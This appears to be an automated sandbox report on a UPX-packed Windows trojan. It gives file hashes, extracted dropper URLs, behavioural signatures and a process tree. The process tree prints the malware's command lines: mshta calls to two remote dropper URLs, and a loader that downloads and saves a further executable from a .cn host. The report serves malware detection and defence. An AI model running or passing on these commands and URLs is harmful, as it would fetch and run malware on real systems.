Overview

overview

10

Static

static

8

8685b10a30...a3.exe

windows7-x64

10

8685b10a30...a3.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    140s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220901-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system
  • submitted
    01-12-2022 21:51

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    8685b10a305b1cf9d877259e60d0bca62d3f74483671f0f9a4e0504cb2baa7a3.exe

  • Size

    31KB

  • MD5

    5f8ea64b83d41b4bcea80bf32ae63d12

  • SHA1

    83170d02b320edb1515dca471285ede69b21f4a1

  • SHA256

    8685b10a305b1cf9d877259e60d0bca62d3f74483671f0f9a4e0504cb2baa7a3

  • SHA512

    90a88bf5f1d679b1ba5d9513561ea9d0b04340fd1aa6d768126d47e774d3533c473fcdc34f0018213c7fa5985d720ff02a1ce48947c734680871357f54153dd7

  • SSDEEP

    768:5LYTkV5ms+JsN9TEzmrB12o0Of6GGkll1hh:lVksus7TESr72o0Oip+l1j

Score
10/10
evasiontrojanupx

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://crusade-affiliates.com/install.php?id=3c3d01f7ff6560e1f038e07d052d60d4

Extracted

Language
hta
Source
URLs
hta.dropper

http://urodinam.net/dfgsdfsdf.php

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 1 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
    evasiontrojan
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Internet Explorer settings 1 TTPs 39 IoCs
    adwarespyware
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 9 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\8685b10a305b1cf9d877259e60d0bca62d3f74483671f0f9a4e0504cb2baa7a3.exe
    "C:\Users\Admin\AppData\Local\Temp\8685b10a305b1cf9d877259e60d0bca62d3f74483671f0f9a4e0504cb2baa7a3.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4876
    • C:\Windows\SysWOW64\mshta.exe
      "C:\Windows\System32\mshta.exe" http://crusade-affiliates.com/install.php?id=3c3d01f7ff6560e1f038e07d052d60d4
      2⤵
        PID:1660
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\System32\mshta.exe" http://urodinam.net/dfgsdfsdf.php
        2⤵
        • Blocklisted process makes network request
        • Checks whether UAC is enabled
        PID:4800
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpp.bat" "
        2⤵
        • Checks computer location settings
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:4260
        • C:\Users\Admin\AppData\Local\Temp\load32.exe
          C:\Users\Admin\AppData\Local\Temp\load32.exe http://0ni9o1s3feu60.cn/u4.exe C:\Users\Admin\AppData\Local\Temp\safety.exe
          3⤵
          • Executes dropped EXE
          PID:2936
    • C:\Program Files (x86)\Internet Explorer\ielowutil.exe
      "C:\Program Files (x86)\Internet Explorer\ielowutil.exe" -CLSID:{0002DF01-0000-0000-C000-000000000046} -Embedding
      1⤵
        PID:216
      • C:\Program Files\Internet Explorer\iexplore.exe
        "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
        1⤵
        • Modifies Internet Explorer settings
        • Suspicious behavior: GetForegroundWindowSpam
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:3832
        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3832 CREDAT:17410 /prefetch:2
          2⤵
          • Modifies Internet Explorer settings
          • Suspicious use of SetWindowsHookEx
          PID:1892
        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3832 CREDAT:82946 /prefetch:2
          2⤵
          • Modifies Internet Explorer settings
          • Suspicious use of SetWindowsHookEx
          PID:1916

      Network

      MITRE ATT&CK Enterprise v6

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
        Filesize

        471B

        MD5

        0ff2da8bfc83bec6bce38ba6a3f7bf58

        SHA1

        84c37df7bed08d69f040c289676735c49a9564eb

        SHA256

        91026f24711c435d99a44884c7239ed1265cd17c0259a6c5885f69e4309421ea

        SHA512

        78afdc44d7557b2f14444182085252e8456c91289511d6f2abfd1d7273d05baba9a94206d370add716b9fc30dc326a1a2e1c78f642e926759d962cf216c3a489

        Download Submit

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
        Filesize

        434B

        MD5

        77ae758997c6da993d43ad668aa632f9

        SHA1

        1dd845fc393b4be4807ada2fae3224544cdbb024

        SHA256

        2d832637f11669d6f066c33ec704fc1cdabf948de22157ec2d3eb6cbfba2ce2f

        SHA512

        87b4bb4c3cc0e22d3a5d2cbc8ad9b01b7bc92e8c0dc73929c056aa292ea1e0408ccfaa13574ac2aca510d48feca8e3842286d2975ac776f9625deeffb07c6dfa

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\load32.exe
        Filesize

        4KB

        MD5

        af40555f69da106abd8544c015d6616c

        SHA1

        dab2bbe6bdfad2d659a54f074985b9c47fe082b8

        SHA256

        5471f76a02fc0252cf9d79ae893e1b8d5635807f63cbd138ad05247f2ffce81b

        SHA512

        d3b773299bdff6b96a2480799ba28495e80d5deac9aca5c9f9310155b289a6ea8d4daab861500344bb277a90dc6e43f22bbd81de3c25088bd9a2946fc9e90bdb

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\load32.exe
        Filesize

        4KB

        MD5

        af40555f69da106abd8544c015d6616c

        SHA1

        dab2bbe6bdfad2d659a54f074985b9c47fe082b8

        SHA256

        5471f76a02fc0252cf9d79ae893e1b8d5635807f63cbd138ad05247f2ffce81b

        SHA512

        d3b773299bdff6b96a2480799ba28495e80d5deac9aca5c9f9310155b289a6ea8d4daab861500344bb277a90dc6e43f22bbd81de3c25088bd9a2946fc9e90bdb

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\tmpp.bat
        Filesize

        530B

        MD5

        f77fb91e50bcc2898a78ef1462436ac4

        SHA1

        ea8be4243028d2a89043a5b64c1dd07460da6a9c

        SHA256

        7f3c2b73078001c6bfbdfa61d8d1f62822bae52dcd2726def766751bdc997d77

        SHA512

        5dfe1f934a015d4a1bda01530e6fe2d986a3fcbc5c1b709ca1fa76fb9386311cf318bf85def9364eda0e53ca241c155c057c9c8759b3bb49f272c81f4416ab78

        Download Submit

      • memory/4876-132-0x0000000000400000-0x0000000000418000-memory.dmp

        Filesize

        96KB

        Download

      • memory/4876-140-0x0000000000400000-0x0000000000418000-memory.dmp

        Filesize

        96KB

        Download